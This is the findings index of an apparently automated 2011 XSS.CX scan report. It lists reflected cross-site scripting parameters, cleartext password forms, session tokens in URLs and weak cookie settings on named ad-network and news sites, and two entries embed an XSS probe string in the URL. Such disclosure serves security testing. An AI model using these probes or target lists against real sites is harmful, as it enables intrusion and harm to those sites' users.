XSS, DORK Report, Cross Site Scripting Report for April 12, 2011

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Tue Apr 12 10:38:19 CDT 2011.

Loading

1. Cross-site scripting (reflected)

1.1. http://a.collective-media.net/adj/cm.foxnews/tier2_031010 [REST URL parameter 2]

1.2. http://a.collective-media.net/adj/cm.foxnews/tier2_031010 [REST URL parameter 3]

1.3. http://a.collective-media.net/adj/cm.foxnews/tier2_031010 [name of an arbitrarily supplied request parameter]

1.4. http://a.collective-media.net/adj/cm.foxnews/tier2_031010 [sz parameter]

1.5. http://a.rfihub.com/sed [pa parameter]

1.6. http://ad.doubleclick.net/adi/fnc/root/stocksearch [name of an arbitrarily supplied request parameter]

1.7. http://ad.doubleclick.net/adj/N763.rocketfuelincOX15601/B4639841.2 [name of an arbitrarily supplied request parameter]

1.8. http://ad.doubleclick.net/adj/N763.rocketfuelincOX15601/B4639841.2 [name of an arbitrarily supplied request parameter]

1.9. http://ad.doubleclick.net/adj/N763.rocketfuelincOX15601/B4639841.2 [sz parameter]

1.10. http://ad.doubleclick.net/adj/N763.rocketfuelincOX15601/B4639841.2 [sz parameter]

1.11. http://ad.doubleclick.net/adj/cm.foxnews/tier2_031010 [net parameter]

1.12. http://ad.doubleclick.net/adj/iblocal.hearsttv.wptz/detail [REST URL parameter 3]

1.13. http://ad.doubleclick.net/adj/iblocal.hearsttv.wptz/index [REST URL parameter 3]

1.14. http://ad.doubleclick.net/adj/ibs.pla.homepage/local [kw parameter]

1.15. http://ad.doubleclick.net/adj/ibs.pla.homepage/local [name of an arbitrarily supplied request parameter]

1.16. http://ad.doubleclick.net/adj/ibs.pla.news/local [kw parameter]

1.17. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745 [REST URL parameter 2]

1.18. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745 [REST URL parameter 3]

1.19. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745 [click parameter]

1.20. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745 [name of an arbitrarily supplied request parameter]

1.21. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

1.22. http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter]

1.23. http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter]

1.24. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

1.25. http://admeld.adnxs.com/usersync [admeld_callback parameter]

1.26. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]

1.27. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]

1.28. http://ads.adap.tv/beacons [callback parameter]

1.29. http://ads.adbrite.com/adserver/vdi/682865 [REST URL parameter 3]

1.30. http://ads.adbrite.com/adserver/vdi/682865 [r parameter]

1.31. http://ads.adbrite.com/adserver/vdi/684339 [REST URL parameter 3]

1.32. http://ads.adbrite.com/adserver/vdi/712156 [REST URL parameter 3]

1.33. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]

1.34. http://ads.adbrite.com/adserver/vdi/762701 [REST URL parameter 3]

1.35. http://ads.adbrite.com/adserver/vdi/779045 [REST URL parameter 3]

1.36. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

1.37. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

1.38. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

1.39. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

1.40. http://ads.pointroll.com/PortalServe/ [flash parameter]

1.41. http://ads.pointroll.com/PortalServe/ [r parameter]

1.42. http://ads.pointroll.com/PortalServe/ [redir parameter]

1.43. http://ads.pointroll.com/PortalServe/ [time parameter]

1.44. http://adserver.veruta.com/cookiematch.fcgi [admeld_adprovider_id parameter]

1.45. http://adserver.veruta.com/cookiematch.fcgi [admeld_callback parameter]

1.46. http://adserving.cpxinteractive.com/st [ad_size parameter]

1.47. http://adserving.cpxinteractive.com/st [section parameter]

1.48. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5 [mpt parameter]

1.49. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5 [mpvc parameter]

1.50. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5 [name of an arbitrarily supplied request parameter]

1.51. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

1.52. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

1.53. http://api.kickapps.com/rest/comments/62976 [callback parameter]

1.54. http://api.zap2it.com/tvlistings/ZCShowtimeAction.do [aid parameter]

1.55. http://b.scorecardresearch.com/beacon.js [c1 parameter]

1.56. http://b.scorecardresearch.com/beacon.js [c10 parameter]

1.57. http://b.scorecardresearch.com/beacon.js [c15 parameter]

1.58. http://b.scorecardresearch.com/beacon.js [c2 parameter]

1.59. http://b.scorecardresearch.com/beacon.js [c3 parameter]

1.60. http://b.scorecardresearch.com/beacon.js [c4 parameter]

1.61. http://b.scorecardresearch.com/beacon.js [c5 parameter]

1.62. http://b.scorecardresearch.com/beacon.js [c6 parameter]

1.63. http://bh.contextweb.com/bh/sync/admeld [admeld_adprovider_id parameter]

1.64. http://bh.contextweb.com/bh/sync/admeld [admeld_callback parameter]

1.65. http://clientapps.kickapps.com/hearst/articleTitles.php [as parameter]

1.66. http://clientapps.kickapps.com/hearst/articleTitles.php [divName parameter]

1.67. http://clientapps.kickapps.com/hearst/articleTitles.php [lSize parameter]

1.68. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php [dName parameter]

1.69. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php [dName parameter]

1.70. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php [id parameter]

1.71. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php [pSize parameter]

1.72. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php [tzAbbr parameter]

1.73. http://clientapps.kickapps.com/hearst/comments/start.php [id parameter]

1.74. http://clientapps.kickapps.com/hearst/comments/start.php [tzAbbr parameter]

1.75. http://d7.zedo.com/jsc/d3/fl.js [l parameter]

1.76. http://d7.zedo.com/jsc/d3/fl.js [l parameter]

1.77. http://d7.zedo.com/lar/v10-003/d7/jsc/flr.js [l parameter]

1.78. http://ds.addthis.com/red/psi/sites/www.ingeniux.com/p.json [callback parameter]

1.79. http://ds.addthis.com/red/psi/sites/www.marqui.com/p.json [callback parameter]

1.80. http://ds.addthis.com/red/psi/sites/www.wcax.com/p.json [callback parameter]

1.81. http://ib.adnxs.com/ab [cnd parameter]

1.82. http://ib.adnxs.com/ab [referrer parameter]

1.83. http://ib.adnxs.com/ab [tt_code parameter]

1.84. http://ib.adnxs.com/ptj [redir parameter]

1.85. http://js.revsci.net/gateway/gw.js [csid parameter]

1.86. http://k.collective-media.net/cmadj/cm.foxnews/tier2_031010 [REST URL parameter 2]

1.87. http://lfov.net/webrecorder/g/chimera.js [vid parameter]

1.88. http://nmp.newsgator.com/NGBuzz/buzz.ashx [_dsrId parameter]

1.89. http://nmp.newsgator.com/NGBuzz/buzz.ashx [buzzId parameter]

1.90. http://nmp.newsgator.com/NGBuzz/buzz.ashx [name of an arbitrarily supplied request parameter]

1.91. http://pixel.adsafeprotected.com/jspix [anId parameter]

1.92. http://pixel.adsafeprotected.com/jspix [campId parameter]

1.93. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]

1.94. http://pixel.adsafeprotected.com/jspix [pubId parameter]

1.95. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

1.96. http://r.turn.com/server/pixel.htm [fpid parameter]

1.97. http://r.turn.com/server/pixel.htm [sp parameter]

1.98. http://studio-5.financialcontent.com/worldnow [Module parameter]

1.99. http://studio-5.financialcontent.com/worldnow [REST URL parameter 1]

1.100. http://studio-5.financialcontent.com/worldnow [name of an arbitrarily supplied request parameter]

1.101. http://ulocal.wptz.com/service/isUserLoggedIn.kickAction [callback parameter]

1.102. http://um.simpli.fi/am_js.js [admeld_adprovider_id parameter]

1.103. http://um.simpli.fi/am_js.js [admeld_callback parameter]

1.104. http://um.simpli.fi/am_match [admeld_adprovider_id parameter]

1.105. http://um.simpli.fi/am_match [admeld_callback parameter]

1.106. http://um.simpli.fi/am_redirect_js [admeld_adprovider_id parameter]

1.107. http://um.simpli.fi/am_redirect_js [admeld_callback parameter]

1.108. http://video.foxnews.com/v/feed/video/4636974.js [callback parameter]

1.109. http://video.foxnews.com/v/feed/video/4637817.js [callback parameter]

1.110. http://video.foxnews.com/v/feed/video/4637903.js [callback parameter]

1.111. http://video.foxnews.com/v/feed/video/4638065.js [callback parameter]

1.112. http://wcax.upickem.net/engine/Splash.aspx [name of an arbitrarily supplied request parameter]

1.113. http://wptz.placelocal.com/_js/ad.js.php [adWidth parameter]

1.114. http://wptz.placelocal.com/_js/scriptloader.js.php [loadedparam parameter]

1.115. http://wptz.placelocal.com/_js/scriptloader.js.php [name of an arbitrarily supplied request parameter]

1.116. http://wptz.placelocal.com/_js/scriptloader.js.php [suffix parameter]

1.117. http://www.internetrix.net/action/event_signup/1066 [REST URL parameter 1]

1.118. http://www.internetrix.net/captcha/77ebd8dc1911e2a888fa4585da1fe3e3.png [REST URL parameter 1]

1.119. http://www.internetrix.net/captcha/77ebd8dc1911e2a888fa4585da1fe3e3.png [REST URL parameter 2]

1.120. http://www.internetrix.net/cgi-bin/ajax/utm_vars.cgi [REST URL parameter 1]

1.121. http://www.internetrix.net/favicon.ico [REST URL parameter 1]

1.122. http://www.internetrix.net/flash/video.swf [REST URL parameter 1]

1.123. http://www.internetrix.net/flash/video.swf [REST URL parameter 2]

1.124. http://www.internetrix.net/freestyle/optimizer [REST URL parameter 1]

1.125. http://www.internetrix.net/freestyle/optimizer [REST URL parameter 2]

1.126. http://www.internetrix.net/general.css [REST URL parameter 1]

1.127. http://www.internetrix.net/optimizer.html [REST URL parameter 1]

1.128. http://www.internetrix.net/page/accreditations/ [REST URL parameter 1]

1.129. http://www.internetrix.net/page/accreditations/dbcde-panel-member/ [REST URL parameter 1]

1.130. http://www.internetrix.net/page/articles/ [REST URL parameter 1]

1.131. http://www.internetrix.net/page/articles/latest-news/ [REST URL parameter 1]

1.132. http://www.internetrix.net/page/articles/newsletters/ [REST URL parameter 1]

1.133. http://www.internetrix.net/page/contact-us/ [REST URL parameter 1]

1.134. http://www.internetrix.net/page/contact-us/jobs-at-internetrix/ [REST URL parameter 1]

1.135. http://www.internetrix.net/page/events/ [REST URL parameter 1]

1.136. http://www.internetrix.net/page/products/ [REST URL parameter 1]

1.137. http://www.mvtimes.com/marthas-vineyard/article.php [id parameter]

1.138. http://www.mvtimes.com/marthas-vineyard/article.php [name of an arbitrarily supplied request parameter]

1.139. http://www.mvtimes.com/marthas-vineyard/classifieds/110.php/%22onmouseover=prompt(945581)%3E [REST URL parameter 4]

1.140. http://www.mvtimes.com/marthas-vineyard/classifieds/110.php/%22onmouseover=prompt(945581)%3E [name of an arbitrarily supplied request parameter]

1.141. http://www.wcax.com/Global/link.asp [name of an arbitrarily supplied request parameter]

1.142. http://www.wcax.com/global/interface/httprequest/hrproxy.asp [url parameter]

1.143. http://www.wcax.com/global/link.asp [function parameter]

1.144. http://www.wcax.com/global/link.asp [mode parameter]

1.145. http://www.wcax.com/global/link.asp [referrer parameter]

1.146. http://y.cdn.adblade.com/imps.php [name of an arbitrarily supplied request parameter]

1.147. http://y.cdn.adblade.com/imps.php [tpUrl parameter]

1.148. http://adserving.cpxinteractive.com/st [Referer HTTP header]

1.149. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]

1.150. http://bh.contextweb.com/bh/sync/admeld [V cookie]

1.151. http://k.collective-media.net/cmadj/cm.foxnews/tier2_031010 [cli cookie]

1.152. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom [meld_sess cookie]

1.153. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom [meld_sess cookie]

1.154. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros [meld_sess cookie]

1.155. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros [meld_sess cookie]

1.156. http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics [meld_sess cookie]

1.157. http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics [meld_sess cookie]

1.158. http://tag.admeld.com/ad/iframe/3/foxnews/728x90/ros [meld_sess cookie]

1.159. http://tag.admeld.com/ad/iframe/3/foxnews/728x90/ros [meld_sess cookie]

1.160. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/300x250/ros [meld_sess cookie]

1.161. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/300x250/ros [meld_sess cookie]

1.162. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/728x90/ros [meld_sess cookie]

1.163. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/728x90/ros [meld_sess cookie]

2. Flash cross-domain policy

2.1. http://fls.doubleclick.net/crossdomain.xml

2.2. http://segment-pixel.invitemedia.com/crossdomain.xml

2.3. http://feeds.bbci.co.uk/crossdomain.xml

2.4. http://googleads.g.doubleclick.net/crossdomain.xml

2.5. http://newsrss.bbc.co.uk/crossdomain.xml

3. Cleartext submission of password

3.1. http://appointron.com/login

3.2. http://appointron.com/users/new

3.3. http://wcax.upickem.net/engine/Splash.aspx

3.4. http://www.vermontopia.com/favicon.ico

3.5. http://www.wcax.com/global/PM/registration.asp

4. Session token in URL

4.1. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php

4.2. http://nmp.newsgator.com/NGBuzz/buzz.ashx

4.3. https://www.google.com/accounts/Captcha

4.4. https://www.google.com/accounts/NewAccount

4.5. http://www.wptz.com/index.html

5. Cookie scoped to parent domain

5.1. http://api.twitter.com/1/WCAX_DAN/lists/wcaxweather/statuses.json

5.2. http://api.twitter.com/1/WCAX_Dan%20/lists/wcaxnews/statuses.json

5.3. http://a.rfihub.com/cm

5.4. http://a.rfihub.com/cm

5.5. http://a.rfihub.com/sed

5.6. http://a.rfihub.com/tk.gif

5.7. http://a1.interclick.com/ColDta.aspx

5.8. http://ad.afy11.net/ad

5.9. http://ad.doubleclick.net/adj/wn.loc.wcax/political

5.10. http://ad.turn.com/server/ads.js

5.11. http://admeld.adnxs.com/usersync

5.12. http://admeld.lucidmedia.com/clicksense/admeld/match

5.13. http://ads.adap.tv/beacons

5.14. http://ads.adap.tv/cookie

5.15. http://ads.adbrite.com/adserver/vdi/682865

5.16. http://ads.adbrite.com/adserver/vdi/684339

5.17. http://ads.adbrite.com/adserver/vdi/712156

5.18. http://ads.adbrite.com/adserver/vdi/742697

5.19. http://ads.adbrite.com/adserver/vdi/762701

5.20. http://ads.adbrite.com/adserver/vdi/779045

5.21. http://ads.pointroll.com/PortalServe/

5.22. http://ads.revsci.net/adserver/ako

5.23. http://ads2.adbrite.com/v0/ad

5.24. http://adx.adnxs.com/mapuid

5.25. http://ak1.abmr.net/is/content.yieldmanager.com

5.26. http://ak1.abmr.net/is/tag.admeld.com

5.27. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5

5.28. http://api.bizographics.com/v1/profile.redirect

5.29. http://b.scorecardresearch.com/b

5.30. http://bcp.crwdcntrl.net/4/c=492%7Crand=102438378%7Cpv=y%7Crt=ifr

5.31. http://bcp.crwdcntrl.net/4/c=492%7Crand=155948644%7Cpv=y%7Crt=ifr

5.32. http://bcp.crwdcntrl.net/4/c=492%7Crand=188465373%7Cpv=y%7Crt=ifr

5.33. http://bcp.crwdcntrl.net/4/c=492%7Crand=277884487%7Cpv=y%7Crt=ifr

5.34. http://bcp.crwdcntrl.net/4/c=492%7Crand=363699370%7Cpv=y%7Crt=ifr

5.35. http://bcp.crwdcntrl.net/4/c=492%7Crand=377648253%7Cpv=y%7Crt=ifr

5.36. http://bcp.crwdcntrl.net/4/c=492%7Crand=554931350%7Cpv=y%7Crt=ifr

5.37. http://bcp.crwdcntrl.net/4/c=492%7Crand=576119975%7Cpv=y%7Crt=ifr

5.38. http://bcp.crwdcntrl.net/4/c=492%7Crand=577383278%7Cpv=y%7Crt=ifr

5.39. http://bcp.crwdcntrl.net/4/c=492%7Crand=614877015%7Cpv=y%7Crt=ifr

5.40. http://bcp.crwdcntrl.net/4/c=492%7Crand=622721104%7Cpv=y%7Crt=ifr

5.41. http://bcp.crwdcntrl.net/4/c=492%7Crand=624837915%7Cpv=y%7Crt=ifr

5.42. http://bcp.crwdcntrl.net/4/c=492%7Crand=708673296%7Cpv=y%7Crt=ifr

5.43. http://bcp.crwdcntrl.net/4/c=492%7Crand=759762185%7Cpv=y%7Crt=ifr

5.44. http://bcp.crwdcntrl.net/4/c=492%7Crand=769353744%7Cpv=y%7Crt=ifr

5.45. http://bcp.crwdcntrl.net/4/c=492%7Crand=770680268%7Cpv=y%7Crt=ifr

5.46. http://bcp.crwdcntrl.net/4/c=492%7Crand=775566438%7Cpv=y%7Crt=ifr

5.47. http://bcp.crwdcntrl.net/4/c=492%7Crand=827998426%7Cpv=y%7Crt=ifr

5.48. http://bcp.crwdcntrl.net/4/c=492%7Crand=939941480%7Cpv=y%7Crt=ifr

5.49. http://bcp.crwdcntrl.net/4/c=492%7Crand=996397162%7Cpv=y%7Crt=ifr

5.50. http://bh.contextweb.com/bh/rtset

5.51. http://bh.contextweb.com/bh/sync/admeld

5.52. http://bs.serving-sys.com/BurstingPipe/adServer.bs

5.53. http://cf.addthis.com/red/p.json

5.54. http://cspix.media6degrees.com/orbserv/hbpix

5.55. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/4608069584519221037

5.56. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4608069584519221037

5.57. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/4608069584519221037

5.58. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4608069584519221037

5.59. http://d.p-td.com/r/dt/id/L21rdC80L21waWQvMTgwNDg2NA/mpuid/4d97b063-cd55-fcc9-f79b-3dc3c331fd5b

5.60. http://d7.zedo.com/lar/v10-003/d7/jsc/flr.js

5.61. http://data.adsrvr.org/map/cookie/google

5.62. http://ds.addthis.com/red/psi/sites/www.ingeniux.com/p.json

5.63. http://ds.addthis.com/red/psi/sites/www.marqui.com/p.json

5.64. http://h.zedo.com/init/0.4907234441488981/g.gif

5.65. http://h.zedo.com/init/0.6948210536502302/g.gif

5.66. http://ib.adnxs.com/ab

5.67. http://ib.adnxs.com/click/4XoUrkfh9j_hehSuR-H2PwAAAMDMzAhAexSuR-H6EUB7FK5H4foRQGyzTtWol9w48f5MdWfsOnh2bqRNAAAAABUbAAC1AAAANQEAAAIAAADXfgQA0WMAAAEAAABVU0QAVVNEACwB-gC1GHIAoA8BAQUCAAQAAAAAuSbBxwAAAAA./cnd=!aBajcAjsLBDX_REYACDRxwEocjFmZmY-4foRQEITCAAQABgAIAEo_v__________AUgAUABYtTFgAGi1Ag../referrer=http%3A%2F%2Fwww.mvtimes.com%2Fmarthas-vineyard%2Fon-island.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DByl0zdm6kTf_uL83P6Aa8svGiCu_675oCp439xBrv8I6PDAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi01NTk3ODc1MDQ2NTQwODA5sgEPd3d3Lm12dGltZXMuY29tugEKMzAweDI1MF9hc8gBCdoBNWh0dHA6Ly93d3cubXZ0aW1lcy5jb20vbWFydGhhcy12aW5leWFyZC9vbi1pc2xhbmQucGhwmAKWC8ACBMgCq4KlDqgDAegDsCroA7II9QMABABE9QMgAAAAgAa-s939482e0DA%26num%3D1%26sig%3DAGiWqtzEpohHrVWeJEJyiZUS6oseA0vyiQ%26client%3Dca-pub-5597875046540809%26adurl%3Dhttp://www.kwanzoo.com/widget/customized/2858/load

5.68. http://ib.adnxs.com/getuid

5.69. http://ib.adnxs.com/getuidu

5.70. http://ib.adnxs.com/if

5.71. http://ib.adnxs.com/mapuid

5.72. http://ib.adnxs.com/ptj

5.73. http://ib.adnxs.com/ptj

5.74. http://ib.adnxs.com/ptj

5.75. http://ib.adnxs.com/pxj

5.76. http://ib.adnxs.com/seg

5.77. http://ib.adnxs.com/setuid

5.78. http://id.google.com/verify/EAAAAB6lkOs5u81YRTwCEWoG6wY.gif

5.79. http://id.google.com/verify/EAAAAPvBCy6A6JaBSsfQHfS92x4.gif

5.80. http://image2.pubmatic.com/AdServer/Pug

5.81. http://insight.adsrvr.org/track/conv

5.82. http://js.revsci.net/gateway/gw.js

5.83. http://leadback.advertising.com/adcedge/lb

5.84. http://load.exelator.com/load/

5.85. http://loadm.exelator.com/load/

5.86. http://m.adnxs.com/msftcookiehandler

5.87. http://metrics.foxnews.com/b/ss/foxnews/1/H.20.3/s57025025668554

5.88. http://odb.outbrain.com/utils/get

5.89. http://odb.outbrain.com/utils/ping.html

5.90. http://pix04.revsci.net/D08734/a1/0/0/0.gif

5.91. http://pix04.revsci.net/E05510/b3/0/3/1003161/184358339.js

5.92. http://pix04.revsci.net/E05510/b3/0/3/1003161/317116761.js

5.93. http://pix04.revsci.net/E05510/b3/0/3/1003161/411477495.js

5.94. http://pix04.revsci.net/E05510/b3/0/3/1003161/564853216.js

5.95. http://pix04.revsci.net/E05510/b3/0/3/1003161/695826942.js

5.96. http://pix04.revsci.net/E05510/b3/0/3/1003161/737002840.js

5.97. http://pix04.revsci.net/E05510/b3/0/3/1003161/779915473.js

5.98. http://pix04.revsci.net/E05510/b3/0/3/1003161/794483737.js

5.99. http://pix04.revsci.net/E05510/b3/0/3/1003161/79844803.js

5.100. http://pix04.revsci.net/E05510/b3/0/3/1003161/844383816.js

5.101. http://pix04.revsci.net/E05510/b3/0/3/1003161/846854188.js

5.102. http://pix04.revsci.net/E05511/a4/0/0/pcx.js

5.103. http://pix04.revsci.net/E05511/b3/0/3/0902121/10608952.js

5.104. http://pix04.revsci.net/E05511/b3/0/3/0902121/135299998.js

5.105. http://pix04.revsci.net/E05511/b3/0/3/0902121/209148801.js

5.106. http://pix04.revsci.net/E05511/b3/0/3/0902121/21225103.js

5.107. http://pix04.revsci.net/E05511/b3/0/3/0902121/281102501.js

5.108. http://pix04.revsci.net/E05511/b3/0/3/0902121/285224161.js

5.109. http://pix04.revsci.net/E05511/b3/0/3/0902121/316223818.js

5.110. http://pix04.revsci.net/E05511/b3/0/3/0902121/354226275.js

5.111. http://pix04.revsci.net/E05511/b3/0/3/0902121/64495114.js

5.112. http://pix04.revsci.net/E05511/b3/0/3/0902121/695595891.js

5.113. http://pix04.revsci.net/E05511/b3/0/3/0902121/699418016.js

5.114. http://pix04.revsci.net/E05511/b3/0/3/0902121/700224037.js

5.115. http://pix04.revsci.net/E05511/b3/0/3/0902121/71706519.js

5.116. http://pix04.revsci.net/E05511/b3/0/3/0902121/734832866.js

5.117. http://pix04.revsci.net/E05511/b3/0/3/0902121/73563402.js

5.118. http://pix04.revsci.net/E05511/b3/0/3/0902121/806386945.js

5.119. http://pix04.revsci.net/E05511/b3/0/3/0902121/871550918.js

5.120. http://pix04.revsci.net/E05511/b3/0/3/0902121/914837697.js

5.121. http://pix04.revsci.net/E05511/b3/0/3/0902121/918432446.js

5.122. http://pixel.33across.com/ps/

5.123. http://pixel.invitemedia.com/adnxs_sync

5.124. http://pixel.quantserve.com/pixel

5.125. http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif

5.126. http://pixel.quantserve.com/pixel/p-86ZJnSph3DaTI.gif

5.127. http://pixel.quantserve.com/seg/p-ddEiIs2qFSY46.js

5.128. http://pixel.rubiconproject.com/tap.php

5.129. http://r.openx.net/set

5.130. http://r.turn.com/r/bd

5.131. http://r.turn.com/r/beacon

5.132. http://r.turn.com/server/pixel.htm

5.133. http://r1-ads.ace.advertising.com/ctst=1/site=751177/size=728090/u=2/bnum=78539819/hr=12/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=

5.134. http://r1-ads.ace.advertising.com/site=751177/size=728090/u=2/bnum=78539819/hr=12/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=

5.135. http://segment-pixel.invitemedia.com/pixel

5.136. http://segment-pixel.invitemedia.com/unpixel

5.137. http://segments.adap.tv/data

5.138. http://segments.adap.tv/data/

5.139. http://server.iad.liveperson.net/hc/47227738/

5.140. http://sync.adap.tv/sync

5.141. http://sync.mathtag.com/sync/img

5.142. http://sync.tidaltv.com/adaptv.ashx

5.143. http://tacoda.at.atwola.com/rtx/r.js

5.144. http://tags.bluekai.com/ids

5.145. http://tags.bluekai.com/site/2174

5.146. http://tags.bluekai.com/site/2731

5.147. http://tags.bluekai.com/site/668

5.148. http://vlog.leadforce1.com/bf/bf.php

5.149. http://www.valtira.com/gwo

5.150. http://www.wesh.com/images/structures/misc/play_overlay_small.png

5.151. http://www.wmur.com/images/structures/tabs/sponsor_tile_transparent.png

5.152. http://www.wptz.com/

5.153. http://www.wtp101.com/ab_sync

5.154. http://xcdn.xgraph.net/15530/db/xg.gif

5.155. http://y.cdn.adblade.com/imps.php

6. Cookie without HttpOnly flag set

6.1. http://affiliate.kickapps.com/service/getWidget.kickAction

6.2. http://kellwood.com/

6.3. http://pixel.adsafeprotected.com/jspix

6.4. http://provideby.com/show_dynamic/coupon/livingsocial-fnews/300x250-POL/

6.5. http://s.clickability.com/s

6.6. http://t3.trackalyzer.com/trackalyze.asp

6.7. http://trc.taboolasyndication.com/hearst-wptz/trc/2/json

6.8. http://ulocal.wptz.com/service/isUserLoggedIn.kickAction

6.9. http://valtira.com/

6.10. http://www.clickability.com/

6.11. http://www.clickability.com/crossdomain.xml

6.12. http://www.clickability.com/googlewotep

6.13. http://www.clickability.com/templates/Corp_Scripts_Template.js

6.14. http://www.clickability.com/templates/browser.js

6.15. http://www.clickability.com/templates/clk_dbtemp_main.css

6.16. http://www.clickability.com/templates/popovers.js

6.17. http://www.clickability.com/templates/swfobject.js

6.18. http://www.mvtimes.com/marthas-vineyard/directory/

6.19. http://www.valtira.com/gwo

6.20. http://www.vermontopia.com/

6.21. http://69.16.184.116/v8u2m5i8/cds/tags2/4-1007209.js

6.22. http://a.rfihub.com/cm

6.23. http://a.rfihub.com/cm

6.24. http://a.rfihub.com/sed

6.25. http://a.rfihub.com/tk.gif

6.26. http://a1.interclick.com/ColDta.aspx

6.27. http://a1.interclick.com/getInPageJSProcess.aspx

6.28. http://ad.afy11.net/ad

6.29. http://ad.doubleclick.net/adj/wn.loc.wcax/political

6.30. http://ad.turn.com/server/ads.js

6.31. http://ad.yieldmanager.com/iframe3

6.32. http://ad.yieldmanager.com/iframe3

6.33. http://ad.yieldmanager.com/imp

6.34. http://ad.yieldmanager.com/pixel

6.35. http://ad.yieldmanager.com/unpixel

6.36. http://admeld.lucidmedia.com/clicksense/admeld/match

6.37. http://admonkey.dapper.net/AdBriteUIDMonster

6.38. http://ads.adap.tv/beacons

6.39. http://ads.adap.tv/cookie

6.40. http://ads.adbrite.com/adserver/vdi/682865

6.41. http://ads.adbrite.com/adserver/vdi/684339

6.42. http://ads.adbrite.com/adserver/vdi/712156

6.43. http://ads.adbrite.com/adserver/vdi/742697

6.44. http://ads.adbrite.com/adserver/vdi/762701

6.45. http://ads.adbrite.com/adserver/vdi/779045

6.46. http://ads.financialcontent.com/www/delivery/afr.php

6.47. http://ads.financialcontent.com/www/delivery/lg.php

6.48. http://ads.pointroll.com/PortalServe/

6.49. http://ads.revsci.net/adserver/ako

6.50. http://ads2.adbrite.com/v0/ad

6.51. http://affiliate.kickapps.com/crossdomain.xml

6.52. http://ak1.abmr.net/is/content.yieldmanager.com

6.53. http://ak1.abmr.net/is/tag.admeld.com

6.54. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5

6.55. http://analytics.worldnow.com/dcsuhch2hzersfqyzf2de5tct_4d8l/dcs.gif

6.56. http://analytics.worldnow.com/dcsuhch2hzersfqyzf2de5tct_4d8l/dcs.gif

6.57. http://api.bizographics.com/v1/profile.redirect

6.58. http://api.twitter.com/1/WCAX_DAN/lists/wcaxweather/statuses.json

6.59. http://ar.atwola.com/atd

6.60. http://b.scorecardresearch.com/b

6.61. http://bcp.crwdcntrl.net/4/c=492%7Crand=102438378%7Cpv=y%7Crt=ifr

6.62. http://bcp.crwdcntrl.net/4/c=492%7Crand=155948644%7Cpv=y%7Crt=ifr

6.63. http://bcp.crwdcntrl.net/4/c=492%7Crand=188465373%7Cpv=y%7Crt=ifr

6.64. http://bcp.crwdcntrl.net/4/c=492%7Crand=277884487%7Cpv=y%7Crt=ifr

6.65. http://bcp.crwdcntrl.net/4/c=492%7Crand=363699370%7Cpv=y%7Crt=ifr

6.66. http://bcp.crwdcntrl.net/4/c=492%7Crand=377648253%7Cpv=y%7Crt=ifr

6.67. http://bcp.crwdcntrl.net/4/c=492%7Crand=554931350%7Cpv=y%7Crt=ifr

6.68. http://bcp.crwdcntrl.net/4/c=492%7Crand=576119975%7Cpv=y%7Crt=ifr

6.69. http://bcp.crwdcntrl.net/4/c=492%7Crand=577383278%7Cpv=y%7Crt=ifr

6.70. http://bcp.crwdcntrl.net/4/c=492%7Crand=614877015%7Cpv=y%7Crt=ifr

6.71. http://bcp.crwdcntrl.net/4/c=492%7Crand=622721104%7Cpv=y%7Crt=ifr

6.72. http://bcp.crwdcntrl.net/4/c=492%7Crand=624837915%7Cpv=y%7Crt=ifr

